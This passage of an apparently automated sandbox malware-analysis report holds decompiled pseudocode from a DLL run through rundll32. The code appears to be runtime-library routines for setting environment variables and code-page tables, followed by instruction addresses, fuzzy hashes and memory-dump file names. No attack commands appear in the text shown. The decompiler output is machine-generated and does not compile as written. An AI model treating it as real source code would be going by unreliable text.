				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v48;
				signed int _v100;
				signed int _v136;
				signed int _t116;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				void* _t147;
				signed int _t152;
				signed int* _t154;
				signed int* _t160;
				signed int _t166;
				signed int _t169;
				void* _t170;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t182;
				intOrPtr* _t191;
				signed int _t196;
				signed int _t203;
				intOrPtr* _t210;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t237;
				signed int _t238;
				void* _t239;
				void* _t241;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				signed int _t281;
				signed int _t282;
				void* _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				WCHAR* _t302;
				signed int _t303;
				signed int _t304;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;
				void* _t324;

				_t222 = __ebx;
				_t308 = _t316;
				_t317 = _t316 - 0x10;
				_t295 = _a4;
				_t326 = _t295;
				if(_t295 != 0) {
					_push(__ebx);
					_t286 = _t295;
					_t116 = E10041B10(_t295, 0x3d);
					_v20 = _t116;
					__eflags = _t116;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t116 - _t295;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t116 + 1));
							L120();
							_t222 = 0;
							__eflags =  *0x1004e384 - _t222; // 0x48a288
							if(__eflags != 0) {
								L14:
								_t121 =  *0x1004e384; // 0x48a288
								_v12 = _t121;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L39;
								} else {
									_t124 = E10029436(_t295, _v20 - _t295);
									_v16 = _t124;
									_t237 = _v12;
									__eflags = _t124;
									if(_t124 < 0) {
										L24:
										__eflags = _v5 - _t222;
										if(_v5 == _t222) {
											goto L40;
										} else {
											_t125 =  ~_t124;
											_v16 = _t125;
											_t30 = _t125 + 2; // 0x2
											_t282 = _t30;
											__eflags = _t282 - _t125;
											if(_t282 < _t125) {
												goto L39;
											} else {
												__eflags = _t282 - 0x3fffffff;
												if(_t282 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E10029699(_t237, _t282, 4);
													E100268B3(_t222);
													_t128 = _v12;
													_t317 = _t317 + 0x10;
													__eflags = _t128;
													if(_t128 == 0) {
														goto L39;
													} else {
														_t238 = _v16;
														_t286 = _t222;
														 *(_t128 + _t238 * 4) = _t295;
														 *(_t128 + 4 + _t238 * 4) = _t222;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t237 - _t222;
										if( *_t237 == _t222) {
											goto L24;
										} else {
											E100268B3( *((intOrPtr*)(_t237 + _t124 * 4)));
											_t281 = _v16;
											__eflags = _v5 - _t222;
											if(_v5 != _t222) {
												_t286 = _t222;
												 *(_v12 + _t281 * 4) = _t295;
											} else {
												_t282 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t282 + _t281 * 4)) - _t222;
													if( *((intOrPtr*)(_t282 + _t281 * 4)) == _t222) {
														break;
													}
													 *((intOrPtr*)(_t282 + _t281 * 4)) =  *((intOrPtr*)(_t282 + 4 + _t281 * 4));
													_t281 = _t281 + 1;
													__eflags = _t281;
												}
												_v16 = E10029699(_t282, _t281, 4);
												E100268B3(_t222);
												_t128 = _v16;
												_t317 = _t317 + 0x10;
												__eflags = _t128;
												if(_t128 != 0) {
													L29:
													 *0x1004e384 = _t128;
												}
											}
											__eflags = _a8 - _t222;
											if(_a8 == _t222) {
												goto L40;
											} else {
												_t239 = _t295 + 1;
												do {
													_t129 =  *_t295;
													_t295 = _t295 + 1;
													__eflags = _t129;
												} while (_t129 != 0);
												_v16 = _t295 - _t239 + 2;
												_t298 = E10026850(_t295 - _t239 + 2, 1);
												_pop(_t241);
												__eflags = _t298;
												if(_t298 == 0) {
													L37:
													E100268B3(_t298);
													goto L40;
												} else {
													_t133 = E100120A5(_t298, _v16, _a4);
													_t319 = _t317 + 0xc;
													__eflags = _t133;
													if(__eflags != 0) {
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														E1000E341();
														asm("int3");
														_push(_t308);
														_t310 = _t319;
														_t320 = _t319 - 0x10;
														_push(_t222);
														_t225 = _v48;
														__eflags = _t225;
														if(__eflags != 0) {
															_push(_t298);
															_push(_t286);
															_push(0x3d);
															_push(_t225);
															_t288 = _t225;
															_t135 = E10041C3B(_t241);
															_v20 = _t135;
															__eflags = _t135;
															if(__eflags == 0) {
																L81:
																 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
																goto L82;
															} else {
																__eflags = _t135 - _t225;
																if(__eflags == 0) {
																	goto L81;
																} else {
																	_t139 =  *(_t135 + 2) & 0x0000ffff;
																	_v24 = _t139;
																	_v16 = _t139;
																	E1002941C();
																	_t300 =  *0x1004e388; // 0x0
																	_t226 = 0;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		L59:
																		_v20 = _v20 - _t288 >> 1;
																		_t142 = E1002948B(_t288, _v20 - _t288 >> 1);
																		_v12 = _t142;
																		__eflags = _t142;
																		if(_t142 < 0) {
																			L67:
																			__eflags = _v16 - _t226;
																			if(_v16 == _t226) {
																				goto L83;
																			} else {
																				_t143 =  ~_t142;
																				_v12 = _t143;
																				_t75 = _t143 + 2; // 0x2
																				_t252 = _t75;
																				__eflags = _t252 - _t143;
																				if(_t252 < _t143) {
																					goto L82;
																				} else {
																					__eflags = _t252 - 0x3fffffff;
																					if(_t252 >= 0x3fffffff) {
																						goto L82;
																					} else {
																						_t301 = E10029699(_t300, _t252, 4);
																						E100268B3(_t226);
																						_t320 = _t320 + 0x10;
																						__eflags = _t301;
																						if(_t301 == 0) {
																							goto L82;
																						} else {
																							_t253 = _v12;
																							_t288 = _t226;
																							_t146 = _v0;
																							 *(_t301 + _t253 * 4) = _t146;
																							 *(_t301 + 4 + _t253 * 4) = _t226;
																							goto L72;
																						}
																					}
																				}
																			}
																		} else {
																			__eflags =  *_t300 - _t226;
																			if( *_t300 == _t226) {
																				goto L67;
																			} else {
																				E100268B3( *((intOrPtr*)(_t300 + _t142 * 4)));
																				_t274 = _v12;
																				__eflags = _v16 - _t226;
																				if(_v16 == _t226) {
																					while(1) {
																						__eflags =  *(_t300 + _t274 * 4) - _t226;
																						if( *(_t300 + _t274 * 4) == _t226) {
																							break;
																						}
																						 *(_t300 + _t274 * 4) =  *(_t300 + 4 + _t274 * 4);
																						_t274 = _t274 + 1;
																						__eflags = _t274;
																					}
																					_t301 = E10029699(_t300, _t274, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0x10;
																					_t146 = _t288;
																					__eflags = _t301;
																					if(_t301 != 0) {
																						L72:
																						 *0x1004e388 = _t301;
																					}
																				} else {
																					_t146 = _v0;
																					_t288 = _t226;
																					 *(_t300 + _t274 * 4) = _t146;
																				}
																				__eflags = _a4 - _t226;
																				if(_a4 == _t226) {
																					goto L83;
																				} else {
																					_t254 = _t146;
																					_t84 = _t254 + 2; // 0x2
																					_t283 = _t84;
																					do {
																						_t147 =  *_t254;
																						_t254 = _t254 + 2;
																						__eflags = _t147 - _t226;
																					} while (_t147 != _t226);
																					_t85 = (_t254 - _t283 >> 1) + 2; // 0x0
																					_v16 = _t85;
																					_t302 = E10026850(_t85, 2);
																					_pop(_t258);
																					__eflags = _t302;
																					if(_t302 == 0) {
																						L80:
																						E100268B3(_t302);
																						goto L83;
																					} else {
																						_t152 = E10028A30(_t302, _v16, _v0);
																						_t322 = _t320 + 0xc;
																						__eflags = _t152;
																						if(_t152 != 0) {
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							E1000E341();
																							asm("int3");
																							_push(_t310);
																							_t312 = _t322;
																							_push(_t288);
																							_t290 = _v100;
																							__eflags = _t290;
																							if(_t290 != 0) {
																								_t260 = 0;
																								_t154 = _t290;
																								__eflags =  *_t290;
																								if( *_t290 != 0) {
																									do {
																										_t154 =  &(_t154[1]);
																										_t260 = _t260 + 1;
																										__eflags =  *_t154;
																									} while ( *_t154 != 0);
																								}
																								_t96 = _t260 + 1; // 0x2
																								_t303 = E10026850(_t96, 4);
																								_t262 = _t302;
																								__eflags = _t303;
																								if(_t303 == 0) {
																									L101:
																									E10012120(_t226, _t262, _t283, _t303);
																									goto L102;
																								} else {
																									_t270 =  *_t290;
																									__eflags = _t270;
																									if(_t270 == 0) {
																										L100:
																										E100268B3(0);
																										_t177 = _t303;
																										goto L88;
																									} else {
																										_push(_t226);
																										_t226 = _t303 - _t290;
																										__eflags = _t226;
																										do {
																											_t97 = _t270 + 1; // 0x5
																											_t283 = _t97;
																											do {
																												_t178 =  *_t270;
																												_t270 = _t270 + 1;
																												__eflags = _t178;
																											} while (_t178 != 0);
																											_t262 = _t270 - _t283;
																											_t98 = _t262 + 1; // 0x6
																											_v16 = _t98;
																											 *(_t226 + _t290) = E10026850(_t98, 1);
																											E100268B3(0);
																											_t322 = _t322 + 0xc;
																											__eflags =  *(_t226 + _t290);
																											if( *(_t226 + _t290) == 0) {
																												goto L101;
																											} else {
																												_t182 = E100120A5( *(_t226 + _t290), _v16,  *_t290);
																												_t322 = _t322 + 0xc;
																												__eflags = _t182;
																												if(_t182 != 0) {
																													L102:
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													E1000E341();
																													asm("int3");
																													_push(_t312);
																													_push(_t262);
																													_push(_t262);
																													_push(_t290);
																													_t291 = _v136;
																													__eflags = _t291;
																													if(_t291 != 0) {
																														_t284 = 0;
																														_t160 = _t291;
																														_t263 = 0;
																														_v20 = 0;
																														__eflags =  *_t291;
																														if( *_t291 != 0) {
																															do {
																																_t160 =  &(_t160[1]);
																																_t263 = _t263 + 1;
																																__eflags =  *_t160;
																															} while ( *_t160 != 0);
																														}
																														_t107 = _t263 + 1; // 0x2
																														_t304 = E10026850(_t107, 4);
																														_t265 = _t303;
																														__eflags = _t304;
																														if(_t304 == 0) {
																															L118:
																															E10012120(_t226, _t265, _t284, _t304);
																															goto L119;
																														} else {
																															_t267 =  *_t291;
																															__eflags = _t267;
																															if(_t267 == 0) {
																																L117:
																																E100268B3(0);
																																_t169 = _t304;
																																goto L105;
																															} else {
																																_push(_t226);
																																_t226 = _t304 - _t291;
																																__eflags = _t226;
																																do {
																																	_t108 = _t267 + 2; // 0x6
																																	_t284 = _t108;
																																	do {
																																		_t170 =  *_t267;
																																		_t267 = _t267 + 2;
																																		__eflags = _t170 - _v20;
																																	} while (_t170 != _v20);
																																	_t110 = (_t267 - _t284 >> 1) + 1; // 0x3
																																	_v24 = _t110;
																																	 *(_t226 + _t291) = E10026850(_t110, 2);
																																	E100268B3(0);
																																	_t324 = _t322 + 0xc;
																																	__eflags =  *(_t226 + _t291);
																																	if( *(_t226 + _t291) == 0) {
																																		goto L118;
																																	} else {
																																		_t175 = E10028A30( *(_t226 + _t291), _v24,  *_t291);
																																		_t322 = _t324 + 0xc;
																																		__eflags = _t175;
																																		if(_t175 != 0) {
																																			L119:
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			E1000E341();
																																			asm("int3");
																																			_t166 =  *0x1004e384; // 0x48a288
																																			__eflags = _t166 -  *0x1004e390; // 0x48a288
																																			if(__eflags == 0) {
																																				_push(_t166);
																																				L86();
																																				 *0x1004e384 = _t166;
																																				return _t166;
																																			}
																																			return _t166;
																																		} else {
																																			goto L115;
																																		}
																																	}
																																	goto L123;
																																	L115:
																																	_t291 = _t291 + 4;
																																	_t267 =  *_t291;
																																	__eflags = _t267;
																																} while (_t267 != 0);
																																goto L117;
																															}
																														}
																													} else {
																														_t169 = 0;
																														__eflags = 0;
																														L105:
																														return _t169;
																													}
																												} else {
																													goto L98;
																												}
																											}
																											goto L123;
																											L98:
																											_t290 = _t290 + 4;
																											_t270 =  *_t290;
																											__eflags = _t270;
																										} while (_t270 != 0);
																										goto L100;
																									}
																								}
																							} else {
																								_t177 = 0;
																								__eflags = 0;
																								L88:
																								return _t177;
																							}
																						} else {
																							_t272 =  &(_t302[_v20 + 1]);
																							 *((short*)(_t272 - 2)) = 0;
																							asm("sbb eax, eax");
																							__eflags = SetEnvironmentVariableW(_t302,  ~(_v24 & 0x0000ffff) & _t272);
																							if(__eflags == 0) {
																								_t191 = E1002449E(__eflags);
																								_t226 = _t226 | 0xffffffff;
																								__eflags = _t226;
																								 *_t191 = 0x2a;
																							}
																							goto L80;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t196 =  *0x1004e384; // 0x48a288
																		__eflags = _a4;
																		if(_a4 == 0) {
																			L52:
																			__eflags = _v16 - _t226;
																			if(_v16 != _t226) {
																				__eflags = _t196;
																				if(_t196 != 0) {
																					L57:
																					 *0x1004e388 = E10026850(1, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0xc;
																					goto L58;
																				} else {
																					 *0x1004e384 = E10026850(1, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0xc;
																					__eflags =  *0x1004e384 - _t226; // 0x48a288
																					if(__eflags == 0) {
																						goto L82;
																					} else {
																						_t300 =  *0x1004e388; // 0x0
																						__eflags = _t300;
																						if(_t300 != 0) {
																							goto L59;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			} else {
																				_t226 = 0;
																				goto L83;
																			}
																		} else {
																			__eflags = _t196;
																			if(_t196 == 0) {
																				goto L52;
																			} else {
																				__eflags = L10011782();
																				if(__eflags == 0) {
																					goto L81;
																				} else {
																					E1002941C();
																					L58:
																					_t300 =  *0x1004e388; // 0x0
																					__eflags = _t300;
																					if(_t300 == 0) {
																						L82:
																						_t226 = _t225 | 0xffffffff;
																						__eflags = _t226;
																						L83:
																						E100268B3(_t288);
																						_t138 = _t226;
																						goto L84;
																					} else {
																						goto L59;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t203 = E1002449E(__eflags);
															 *_t203 = 0x16;
															_t138 = _t203 | 0xffffffff;
															L84:
															return _t138;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t298 - _a4 - 1) = _t222;
														__eflags = E10031BEE(_v20 + 1 + _t298 - _a4, _t282, __eflags, _t298,  ~_v5 & _v20 + 0x00000001 + _t298 - _a4);
														if(__eflags == 0) {
															_t210 = E1002449E(__eflags);
															_t223 = _t222 | 0xffffffff;
															__eflags = _t223;
															 *_t210 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t222;
									if(_v5 != _t222) {
										 *0x1004e384 = E10026850(1, 4);
										E100268B3(_t222);
										_t317 = _t317 + 0xc;
										__eflags =  *0x1004e384 - _t222; // 0x48a288
										if(__eflags == 0) {
											L39:
											_t223 = _t222 | 0xffffffff;
											__eflags = _t223;
											goto L40;
										} else {
											__eflags =  *0x1004e388 - _t222; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x1004e388 = E10026850(1, 4);
												E100268B3(_t222);
												_t317 = _t317 + 0xc;
												__eflags =  *0x1004e388 - _t222; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t223 = 0;
										L40:
										E100268B3(_t286);
										_t119 = _t223;
										goto L41;
									}
								} else {
									__eflags =  *0x1004e388 - _t222; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L1001177D();
										if(__eflags == 0) {
											goto L38;
										} else {
											L120();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t221 = E1002449E(_t326);
					 *_t221 = 0x16;
					_t119 = _t221 | 0xffffffff;
					L41:
					return _t119;
				}
				L123:
			}

0x10028e03
0x10028e06
0x10028e08
0x10028e0c
0x10028e0f
0x10028e11
0x10028e26
0x10028e2b
0x10028e2d
0x10028e32
0x10028e37
0x10028e39
0x1002901a
0x1002901f
0x00000000
0x10028e3f
0x10028e3f
0x10028e41
0x00000000
0x10028e47
0x10028e4a
0x10028e4d
0x10028e52
0x10028e54
0x10028e5a
0x10028ed7
0x10028ed7
0x10028edc
0x10028edf
0x10028ee1
0x00000000
0x10028ee7
0x10028eee
0x10028ef3
0x10028ef8
0x10028efb
0x10028efd
0x10028f4e
0x10028f4e
0x10028f51
0x00000000
0x10028f57
0x10028f57
0x10028f59
0x10028f5c
0x10028f5c
0x10028f5f
0x10028f61
0x00000000
0x10028f67
0x10028f67
0x10028f6d
0x00000000
0x10028f73
0x10028f7d
0x10028f80
0x10028f85
0x10028f88
0x10028f8b
0x10028f8d
0x00000000
0x10028f93
0x10028f93
0x10028f96
0x10028f98
0x10028f9b
0x00000000
0x10028f9b
0x10028f8d
0x10028f6d
0x10028f61
0x10028eff
0x10028eff
0x10028f01
0x00000000
0x10028f03
0x10028f06
0x10028f0c
0x10028f0f
0x10028f12
0x10028f47
0x10028f49
0x10028f14
0x10028f14
0x10028f21
0x10028f21
0x10028f24
0x00000000
0x00000000
0x10028f1d
0x10028f20
0x10028f20
0x10028f20
0x10028f30
0x10028f33
0x10028f38
0x10028f3b
0x10028f3e
0x10028f40
0x10028f9f
0x10028f9f
0x10028f9f
0x10028f40
0x10028fa4
0x10028fa7
0x00000000
0x10028fa9
0x10028fa9
0x10028fac
0x10028fac
0x10028fae
0x10028faf
0x10028faf
0x10028fbb
0x10028fc3
0x10028fc6
0x10028fc7
0x10028fc9
0x10029011
0x10029012
0x00000000
0x10028fcb
0x10028fd2
0x10028fd7
0x10028fda
0x10028fdc
0x10029036
0x10029037
0x10029038
0x10029039
0x1002903a
0x1002903b
0x10029040
0x10029043
0x10029044
0x10029046
0x10029049
0x1002904a
0x1002904d
0x1002904f
0x10029064
0x10029065
0x10029066
0x10029068
0x10029069
0x1002906b
0x10029070
0x10029075
0x10029077
0x1002926d
0x10029272
0x00000000
0x1002907d
0x1002907d
0x1002907f
0x00000000
0x10029085
0x10029089
0x1002908b
0x1002908e
0x10029091
0x10029096
0x1002909c
0x1002909e
0x100290a0
0x1002912b
0x10029136
0x10029139
0x1002913e
0x10029143
0x10029145
0x10029193
0x10029193
0x10029197
0x00000000
0x1002919d
0x1002919d
0x1002919f
0x100291a2
0x100291a2
0x100291a5
0x100291a7
0x00000000
0x100291ad
0x100291ad
0x100291b3
0x00000000
0x100291b9
0x100291c3
0x100291c5
0x100291ca
0x100291cd
0x100291cf
0x00000000
0x100291d5
0x100291d5
0x100291d8
0x100291da
0x100291dd
0x100291e0
0x00000000
0x100291e0
0x100291cf
0x100291b3
0x100291a7
0x10029147
0x10029147
0x10029149
0x00000000
0x1002914b
0x1002914e
0x10029154
0x10029157
0x1002915b
0x10029172
0x10029172
0x10029175
0x00000000
0x00000000
0x1002916e
0x10029171
0x10029171
0x10029171
0x10029181
0x10029183
0x10029188
0x1002918b
0x1002918d
0x1002918f
0x100291e4
0x100291e4
0x100291e4
0x1002915d
0x1002915d
0x10029160
0x10029162
0x10029162
0x100291ea
0x100291ed
0x00000000
0x100291f3
0x100291f3
0x100291f5
0x100291f5
0x100291f8
0x100291f8
0x100291fb
0x100291fe
0x100291fe
0x10029209
0x1002920d
0x10029215
0x10029218
0x10029219
0x1002921b
0x10029264
0x10029265
0x00000000
0x1002921d
0x10029225
0x1002922a
0x1002922d
0x1002922f
0x10029289
0x1002928a
0x1002928b
0x1002928c
0x1002928d
0x1002928e
0x10029293
0x10029296
0x10029297
0x1002929a
0x1002929b
0x1002929e
0x100292a0
0x100292a7
0x100292a9
0x100292ab
0x100292ad
0x100292af
0x100292af
0x100292b2
0x100292b3
0x100292b3
0x100292af
0x100292b9
0x100292c4
0x100292c7
0x100292c8
0x100292ca
0x10029332
0x10029332
0x00000000
0x100292cc
0x100292cc
0x100292ce
0x100292d0
0x10029322
0x10029324
0x1002932a
0x00000000
0x100292d2
0x100292d2
0x100292d5
0x100292d5
0x100292d7
0x100292d7
0x100292d7
0x100292da
0x100292da
0x100292dc
0x100292dd
0x100292dd
0x100292e1
0x100292e5
0x100292e9
0x100292f3
0x100292f6
0x100292fb
0x100292fe
0x10029302
0x00000000
0x10029304
0x1002930c
0x10029311
0x10029314
0x10029316
0x10029337
0x10029339
0x1002933a
0x1002933b
0x1002933c
0x1002933d
0x1002933e
0x10029343
0x10029346
0x10029349
0x1002934a
0x1002934b
0x1002934c
0x1002934f
0x10029351
0x10029358
0x1002935a
0x1002935c
0x1002935e
0x10029361
0x10029363
0x10029365
0x10029365
0x10029368
0x10029369
0x10029369
0x10029365
0x1002936e
0x10029379
0x1002937c
0x1002937d
0x1002937f
0x100293f0
0x100293f0
0x00000000
0x10029381
0x10029381
0x10029383
0x10029385
0x100293df
0x100293e2
0x100293e8
0x00000000
0x10029387
0x10029387
0x1002938a
0x1002938a
0x1002938c
0x1002938c
0x1002938c
0x1002938f
0x1002938f
0x10029392
0x10029395
0x10029395
0x100293a1
0x100293a5
0x100293ad
0x100293b3
0x100293b8
0x100293bb
0x100293bf
0x00000000
0x100293c1
0x100293c9
0x100293ce
0x100293d1
0x100293d3
0x100293f5
0x100293f7
0x100293f8
0x100293f9
0x100293fa
0x100293fb
0x100293fc
0x10029401
0x10029402
0x10029407
0x1002940d
0x1002940f
0x10029410
0x10029416
0x00000000
0x10029416
0x1002941b
0x00000000
0x00000000
0x00000000
0x100293d3
0x00000000
0x100293d5
0x100293d5
0x100293d8
0x100293da
0x100293da
0x00000000
0x100293de
0x10029385
0x10029353
0x10029353
0x10029353
0x10029355
0x10029357
0x10029357
0x00000000
0x00000000
0x00000000
0x10029316
0x00000000
0x10029318
0x10029318
0x1002931b
0x1002931d
0x1002931d
0x00000000
0x10029321
0x100292d0
0x100292a2
0x100292a2
0x100292a2
0x100292a4
0x100292a6
0x100292a6
0x10029231
0x10029235
0x1002923a
0x10029246
0x10029252
0x10029254
0x10029256
0x1002925b
0x1002925b
0x1002925e
0x1002925e
0x00000000
0x10029254
0x1002922f
0x1002921b
0x100291ed
0x10029149
0x100290a6
0x100290a6
0x100290ab
0x100290ae
0x100290c8
0x100290c8
0x100290cc
0x100290d5
0x100290d7
0x10029106
0x10029110
0x10029115
0x1002911a
0x00000000
0x100290d9
0x100290e3
0x100290e8
0x100290ed
0x100290f0
0x100290f6
0x00000000
0x100290fc
0x100290fc
0x10029102
0x10029104
0x00000000
0x00000000
0x00000000
0x00000000
0x10029104
0x100290f6
0x100290ce
0x100290ce
0x00000000
0x100290ce
0x100290b0
0x100290b0
0x100290b2
0x00000000
0x100290b4
0x100290b9
0x100290bb
0x00000000
0x100290c1
0x100290c1
0x1002911d
0x1002911d
0x10029123
0x10029125
0x10029278
0x10029278
0x10029278
0x1002927b
0x1002927c
0x10029283
0x00000000
0x00000000
0x00000000
0x00000000
0x10029125
0x100290bb
0x100290b2
0x100290ae
0x100290a0
0x1002907f
0x10029051
0x10029051
0x10029056
0x1002905c
0x10029286
0x10029288
0x10029288
0x10028fde
0x10028fef
0x10028ff3
0x10028fff
0x10029001
0x10029003
0x10029008
0x10029008
0x1002900b
0x1002900b
0x00000000
0x10029001
0x10028fdc
0x10028fc9
0x10028fa7
0x10028f01
0x10028efd
0x10028e5c
0x10028e5c
0x10028e5f
0x10028e7d
0x10028e7d
0x10028e80
0x10028e93
0x10028e98
0x10028e9d
0x10028ea0
0x10028ea6
0x10029025
0x10029025
0x10029025
0x00000000
0x10028eac
0x10028eac
0x10028eb2
0x00000000
0x10028eb4
0x10028ebe
0x10028ec3
0x10028ec8
0x10028ecb
0x10028ed1
0x00000000
0x00000000
0x00000000
0x00000000
0x10028ed1
0x10028eb2
0x10028e82
0x10028e82
0x10029028
0x10029029
0x10029030
0x00000000
0x10029032
0x10028e61
0x10028e61
0x10028e67
0x00000000
0x10028e69
0x10028e6e
0x10028e70
0x00000000
0x10028e76
0x10028e76
0x00000000
0x10028e76
0x10028e70
0x10028e67
0x10028e5f
0x10028e5a
0x10028e41
0x10028e13
0x10028e13
0x10028e18
0x10028e1e
0x10029033
0x10029035
0x10029035
0x00000000

APIs

_free.LIBCMT ref: 10028F06
_free.LIBCMT ref: 10028F33

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f8f723e2dfde3e44f245468ad08ce40c13b14607286d724d472a3e5cc6069f0b
Instruction ID: c9aa2e72dc3717b8aeb007e04fd68db8c0b5e47be17badfa8eb106a72592e22b
Opcode Fuzzy Hash: f8f723e2dfde3e44f245468ad08ce40c13b14607286d724d472a3e5cc6069f0b
Instruction Fuzzy Hash: 91D15775D04355AFEB10EFB4AD85AAE77E4EF053D0F92426EF904D7281EB31AA008B54

Uniqueness

Uniqueness Score: -1.00%

Function 1002E7A1, Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1002E7A1(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char* _v80;
				char* _v84;
				void* _v88;
				char _v92;
				void* __edi;
				void* __ebp;
				signed int _t126;
				char _t129;
				char _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				intOrPtr* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				char _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t217;
				short* _t221;
				intOrPtr _t222;
				signed int _t223;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed char _t235;
				signed char* _t236;
				void* _t237;
				char* _t239;
				char* _t240;
				signed char* _t251;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr* _t258;
				signed int _t259;
				short* _t260;
				signed int _t263;
				signed int _t264;
				void* _t265;
				void* _t266;

				_t233 = __edx;
				_t126 =  *0x1004d054; // 0x944e5696
				_v8 = _t126 ^ _t264;
				_t254 = _a4;
				_t205 = 0;
				_v56 = _t254;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t254 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t254;
				_v88 = 0;
				if( *((intOrPtr*)(_t254 + 0xa8)) == 0) {
					__eflags =  *((intOrPtr*)(_t254 + 0x8c));
					if( *((intOrPtr*)(_t254 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t254 + 0x8c)) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *((intOrPtr*)(_t254 + 0x90)) = _t205;
					 *_t254 = 0x10044480;
					 *((intOrPtr*)(_t254 + 0x94)) = 0x10044700;
					 *((intOrPtr*)(_t254 + 0x98)) = 0x10044880;
					 *((intOrPtr*)(_t254 + 4)) = 1;
					L48:
					return E100037EA(_t129, _v8 ^ _t264, _t233);
				}
				_t131 = _t254 + 8;
				_v52 = 0;
				if( *(_t254 + 8) != 0) {
					L3:
					_v52 = E10026850(1, 4);
					E100268B3(_t205);
					_v32 = E10026850(0x180, 2);
					E100268B3(_t205);
					_t237 = E10026850(0x180, 1);
					_v44 = _t237;
					E100268B3(_t205);
					_v36 = E10026850(0x180, 1);
					E100268B3(_t205);
					_v40 = E10026850(0x101, 1);
					E100268B3(_t205);
					_t266 = _t265 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E100268B3(_v52);
						E100268B3(_v32);
						E100268B3(_t237);
						E100268B3(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *((char*)(_t147 + _t217)) = _t147;
								_t147 = _t147 + 1;
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t254 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E100318A5(_t284, _t205,  *((intOrPtr*)(_t254 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t254 + 8), _t205);
								_t266 = _t266 + 0x24;
								_t285 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
